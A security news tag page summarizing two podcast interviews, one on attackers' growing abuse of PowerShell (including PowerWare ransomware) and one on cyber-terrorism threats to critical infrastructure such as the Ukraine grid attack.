Tag: Q&A

Malicious actors are increasingly using legitimate tools such as PowerShell in order to lessen their digital footprint and evade detection, and the use of such ubiquitous and legitimate technology can be a problem for organizations when it comes to defending against those threats.

That’s according to Carbon Black senior security researcher Rico Valdez, who joined us for this week’s Cyber Chat podcast to discuss recent research on PowerShell, including a new report examining more than 1,100 security investigations in 2015.

Windows PowerShell is an automation platform and scripting language that Microsoft describes as “providing a massive set of built-in functionality for taking control of your Windows environments.”

The legitimate use along with the built-in functionality makes it a perfect tool for attackers to exploit.

“It used to be the kind of thing where only really sophisticated adversaries would use it, but it’s gotten to the point now where it’s being incorporated in a lot of commodity malware,” Valdez said. “It’s another way to stay under the radar and try to remain undetected.”

Utilizing PowerShell fits into the overall trend of attackers avoiding dropping a lot of tools onto a system; instead, they utilize what’s already there in order to further their goals.

“Monitoring it can be very tricky,” Valdez said. “I don’t think it’s very well understood even by the larger SOCs (security operations centers). Its one of those things that’s a little bit further down on the list for a lot of these organizations to really dig into.”

How are criminals using PowerShell?

When looking at the data from a variety of Incident Response and MSSP partners, 38% of confirmed cyber incidents used PowerShell. This included all industries and multiple attack campaigns.

“It’s quite powerful in that it can pretty much touch any part of the system, and if you’re running it with the right privileges it can pretty much do anything on the system,” Valdez said.

For example, last month a new family of ransomware was discovered dubbed “PowerWare.” PowerWare uses the popular technique of duping users via phishing messages containing a macro-enabled Microsoft Word document. The malicious macros then use PowerShell to further the attack.

About the Podcast
A new ransomware was recently discovered dubbed PowerWare, which targets organizations via Microsoft Word and PowerShell, and just last week Carbon Black released a report looking at how PowerShell is being utilized for malicious intent. They wrote in the report that “the discovery of using PowerShell in attacks such as PowerWare is part of a larger, worrisome trend when it comes to PowerShell.”

On today’s Cyber Chat we talk with Carbon Black senior security researcher Rico Valdez about the company’s recent findings and how cybercriminals are increasingly using PowerShell to remain under the radar while targeting organizations.

U.S. Cyber Command has its “first wartime assignment” in the fight against ISIS, Secretary of Defense Ashton Cater told an audience at the Center for Strategic and International Studies last Tuesday. That cyber fight includes techniques to disrupt the group’s ability to communicate, organize and finance its operations.

On the same day, head of U.S. Cyber Command Admiral Michael Rogers told the Senate Armed Services Committee that among his biggest fears are the possibility of groups like ISIS manipulating electronic data records, impacting critical infrastructure such as the electrical grid or air traffic control systems, and using cyber tools “as a weapons system.”

The week’s news capped off a period of increasing discussion around cyberwarfare and cyber-terrorism.

It’s an issue that organizations need to be aware of, said cybersecurity and counter-terrorism expert Morgan Wright, who discussed the topic on this week’s Cyber Chat podcast.

“It is a different animal,” Wright said. “Companies really need to understand the implication of the difference between just cybercrime and cyber-terrorism because it will make a difference in how you respond.”

The Cyber-Terrorism Threat

The December 2015 cyber-attack in Ukraine, which affected electricity for 225,000 customers, was unique in that it’s the first confirmed attack to take down a power grid. In addition, just last month the U.S. officially charged an Iranian with access to a computer control system for New York’s Bowman Avenue Dam. Luckily, a gate on the dam had been disconnected for maintenance issues; otherwise, the hacker could have operated and manipulated the gate, authorities said.

Wright agreed with other experts that the BlackEnergy malware used in the Ukraine attack is a bigger issue than other often-cited critical infrastructure threats such as Stuxnet.

“It’s in this country, and we talk about it but we don’t really take it seriously,” Wright said. “[BlackEnergy] could actually be a terrorist — a cyber-terrorism — type of tactic. … Let’s say that a group like Al-Qaeda or ISIS gets ahold of this and they decide they want to take out part of our power grid.”

But it’s not just critical infrastructure operators who need to be concerned about cyber-terrorism, he added. Organizations, particularly those with ties to often-targeted states such as Israel, need to be aware of those risks.

Businesses need to examine their geopolitical footprint, Wright said. Where are you operating, what types of things may be impacted if you are targeted by some of these organizations, and how can you better prepare to defend against those potential threats?

The Researchers Who Cried Wolf?

There have been a few headline-grabbing events tied to cyberwar and cyber-terrorism, but when compared to traditional cybercrime events, the former threat can appear rather sparse.

When asked about fatigue or backlash from researchers warning of these types of threats, Wright attributed the problem to lack of imagination.

“Plots can take years to develop,” he said. “What I tell people is that just because you can’t imagine it happening right now doesn’t mean it’s not being worked on — it’s not being plotted for.”

As an example he highlighted the recent cybersecurity issues facing the automobile industry. Years before, he said people accused him of fear mongering for bringing up those very issues.

“Now the entire automotive industry is up in arms,” he said.”Guess what? Three years ago they couldn’t imagine that happening, and for 15 years the automotive industry did absolutely nothing.”

In the end though, although cyber-terrorism motivations may be different from cybercrime, the defense is similar.

“You still respond to it. You still prepare. Only later do the motivations really make a difference in terms of what could we have done detect this or prevent this.”

Listen to the full conversation with Morgan Wright for more about cyber-terrorism, the threat of groups like ISIS and his cybersecurity “rules of the road”:

About the Podcast
In an interview last week, U.S. Secretary of Defense Ashton Carter confirmed he had given U.S. Cyber Command its first wartime assignment and that the team would start launching online attacks against ISIS. The announcement comes after several months of news and debate about the issue of cyber-terrorism.

On today’s cyber chat we talk with cyber-terrorism expert Morgan Wright, who has nearly two decades in state and local law enforcement and has previously taken on roles such as a senior advisor for the U.S. State Department Anti-terrorism Assistance Program. We talk about the threat of cyber-terrorism, recent attacks against critical infrastructure, and how groups such as ISIS are impacting the cyber threat landscape.